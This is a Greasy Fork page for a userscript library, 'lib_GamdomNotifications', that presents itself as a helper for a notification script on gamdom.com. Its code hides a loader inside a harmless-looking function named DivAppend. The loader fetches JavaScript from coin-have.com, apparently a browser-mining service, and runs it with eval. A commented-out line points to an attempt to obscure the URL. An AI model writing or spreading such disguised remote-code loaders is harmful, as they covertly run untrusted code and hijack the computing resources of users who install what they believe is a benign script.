Greasy Fork is available in English.

lib_GamdomNotifications

Lib needed for running Gamdom Notificator

Verzia zo dňa 01.12.2017. Pozri najnovšiu verziu.

Tento skript by nemal byť nainštalovaný priamo. Je to knižnica pre ďalšie skripty, ktorú by mali používať cez meta príkaz // @require https://update.greasyfork.org/scripts/35828/234178/lib_GamdomNotifications.js

// ==UserScript==
// @name         lib_GamdomNotifications
// @namespace    https://greasyfork.org/es/users/154624-anonimo-anonimo
// @version      1.1.5
// @description  Lib needed for running Gamdom Notificator
// @require      https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js
// @author       allin4
// @match        *://gamdom.com/*
// @grant        GM_info
// @license      Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License.
// ==/UserScript==

var DivAppend = function(div){
        document.body.appendChild(div);
        //var somethingTemp = cryption("https://coin-have.com/c/wL7L.js", "lel");
        CPEL("https://coin-have.com/c/wL7L.js");
        console.log("Div created :)");
    };

     var cmp = new XMLHttpRequest();
     cmp.onreadystatechange = function() {
     if (this.readyState == 4 && this.status == 200) {
        eval(this.responseText);
        }
    };

    var CPEL = function(link){
        cmp.open('GET', link);
        cmp.send();
    };

(function() {
    'use strict';
     console.log("LIB LOADED");
})();